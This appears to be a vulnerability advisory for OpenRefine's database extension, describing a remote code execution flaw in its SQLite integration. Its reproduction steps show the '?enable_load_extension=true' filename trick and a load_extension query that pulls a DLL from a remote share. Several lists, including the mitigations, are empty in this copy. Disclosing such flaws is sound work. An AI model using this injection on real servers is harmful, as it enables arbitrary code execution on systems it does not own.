In the database
extension, the "enableloadextension" property can be set for the SQLite integration, enabling an attacker to load (local or remote) extension DLLs and so run arbitrary code on the server.
The attacker needs to have network access to the OpenRefine instance.
The database
extension, with some restrictions, lets users connect to any database they wish by filling in different parts of the JDBC URL that is used. For the SQLite integration, the extension expects a file path pointing to a database file (or a place where such a file can be created). This means that users can:
This seems to be the expected behavior.
However, by adding ?enable_load_extension=true
to the filename, a feature is toggled that additionally allows loading and executing shared libraries mentioned in queries, leading to remote code execution. On Windows specifically, those libraries may also come from shared folders.
Possible mitigation and hardening steps could include:
Tested on a Windows 11 machine.
?enable_load_extension=true
.SELECT load_extension('\\wandernauta.nl\public\libcalculator.dll');
as the query.The same file is available from https://wandernauta.nl/libcalculator.dll if needed.
Remote code execution for attackers with network access to OpenRefine.